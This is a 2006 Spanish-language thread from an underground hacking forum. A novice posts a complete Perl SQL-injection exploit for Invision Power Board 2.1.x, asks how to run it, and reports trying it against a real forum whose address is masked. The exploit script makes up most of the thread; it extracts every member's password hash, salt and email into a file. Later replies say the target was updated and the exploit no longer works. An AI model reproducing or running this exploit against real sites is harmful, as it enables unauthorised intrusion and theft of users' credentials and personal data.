Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 21, 2008, 12:32:00
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Aprovechar este exploit para php?? (IPB 2.1.6 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Aprovechar este exploit para php?? (IPB 2.1.6  (Leído 580 veces)
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« en: Agosto 07, 2006, 10:41:42 »
Hola que tal... bueno, he leido mucho acerca de esto, pero las diversas opiniones, me tienen chato.. ej: unos dicen montar el php en el compu, y otros hacerme un FTTP, y ejecutarlo de ahi.... bueno el asunto que la pagina es I.P.B 2.1.6, y baje un exploit... creo que lo es, para IPB 2.1.6

Código:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header();
if ( @ARGV < 2) {&info(); exit();}
$server = $ARGV[0];
$dir = $ARGV[1];
print "[+] SERVER {$server}\r\n";
print "[+] DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[1] Testing forum vulnerability...";
$q = "UNION SELECT 'VULN',1,1,1/*";
query($q,$server,$dir);
if($rep =~/VULN/){ print "forum vulnerable\r\n"; }
else
    {
     print "forum unvulnerable\r\n";
    &footer();
     exit();
    }
#Step 2, detecting prefix
print "[2] Searching prefix...";
$q = "";
query($q,$server,$dir);
$prefix = $rep;
print $prefix."\r\n";
#Step 3, make query
print "[3] Performing query; it may take several minutes, plz, wait...\r\n";
$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";
query($q1,$server,$dir);
$kol = $rep;
open(RES,">".$server."_result.txt");
for($id = 1; $id <= $kol; $id++)
    {
    $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
     query($own_query,$server,$dir);
     if($rep=~/[0-9a-f]{32}/i)
       {
        $hash = $rep;
       $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
         query($own_query,$server,$dir);
         if(length($rep)==5)
          {
          $salt = $rep;
          $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
             query($own_query,$server,$dir);
          if(length($rep)>0)
             {
             $email = $rep;
             print RES $id.":".$hash.":".$salt."::".$email."\n";
             }
         }     
      }
    }
close(RES);
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer();
$ex = <STDIN>;
sub footer()
    {
     print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
     print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
    }
sub header()
{
print q(
----------------------------------------------------------
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
*       Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)   *
*                Coded by w4g.not null                   *
*              FOR EDUCATIONAL PURPOSES *ONLY*           *
----------------------------------------------------------
);
}
sub info()
{
 print q(
[i] Usage: perl w4gipb216.pl [server] [/dir/]
     where
      |- server - server, where IPB installed without http://
      |- /dir/ - dir, where IPB installed or / for no dir
    e.g perl w4gipb216.pl someserver.com /forum/
[i] Stealing info about users (format id:pass:salt::email)   
[!] Need MySQL > 4.0
 );
}
sub query()
    {
     my($q,$server,$dir) =  @_;
     $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q);
     if($res->is_success)
        {
         $rep = '';
         if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
         else
             {
             if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
            }
        }
     return $rep;
    }

# milw0rm.com [2006-07-18]


Que hago con esto??... como lo ejecuto?... supongo que ya no necesito hacer scaneo de vulnerabilidades....no?... como compilo este exploit... lo ejecuto por cmd?...que necesito... ayuda please...
En línea
ManCuerTex
Visitante
« Respuesta #1 en: Agosto 08, 2006, 01:09:53 »
En línea
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« Respuesta #2 en: Agosto 08, 2006, 05:49:20 »
No se por que, pero hace tiempo lo tenia instalado... y compilaba el exploit a mi manera... lo copiaba en un doc de texto, y le cambiaba la extension de .tx a .pl, y en el cmd hacia:
c:\appserv\php\exploit.pl

Pero me ejecutaba para abrirlo con alguna aplicacion del compu...o.O
Igual, usare el buscador, y de ahi edito y les narro lo que me paso...^^
Gracias...

EDIT: cambie de txt a pl, lo puse en c:\perl\exploit.pl
Lo ejecute asi por el cmd y me sale esto...


Lo que pude entender de lo que me decia el exploit de cmd, es que lo estoy ejecutando mal....
Entonces lo que entendi fue que tenia que hacer esto?...

c:\perl\exploit.pl [server] [/dir/]

el server seria www.forosxxxxxxxxx.com (asi es la ruta de los foros...)
Pero que tendria que poner en dir???

Toy mal?.... me pueden decir en que estoy fallando?...
Saludos






EDIT2: Wns!!!.... pude hacerlo... primera vez que llego tan lejos....
la formula era:
c:\perl\exploit.pl 00.00.00.00 www.forosxxxxxxxxx.com
Y me salio esto: (lo hice con otro exploit)



Ahora que tengo este poder, que hago??...
Me imagino, pero para no cagarlas me podrian orientar?...
« Última modificación: Agosto 08, 2006, 07:47:50 por pokesam3 » En línea
Guru
Visitante
« Respuesta #3 en: ſeptiembre 02, 2006, 11:01:04 »
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #4 en: ſeptiembre 02, 2006, 06:21:12 »
En línea

http://foro.new-bytes.net
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« Respuesta #5 en: ſeptiembre 03, 2006, 11:41:30 »
No pude hacerlo... me dice que el foro es "unvulnerable"... es posible?... no puedo hacer nada... y mas aun ahora que cambio a IPB 2.1.7...
No hay ningun exploit para el...
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2061


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #6 en: ſeptiembre 04, 2006, 12:14:00 »
esta actualizado ... y no corre ese exploit

Cheesy
En línea

http://foro.new-bytes.net
anonimox
Habitual
*****
Desconectado Desconectado

Mensajes: 277



Ver Perfil Email
« Respuesta #7 en: ſeptiembre 07, 2006, 07:51:02 »
la verdad que yo he intentado en muchos foros y ninguno me funciono... Huh

al parecer que no funciona el exploit
En línea
http://www.ahost.co.nr  - Servidor para subir cosas sobre hacking

                                          ? \!/ ?
                                           (o o)
------------------------------OOo-(_)-oOOo------------------------
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Aprovechar este exploit para php?? (IPB 2.1.6 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC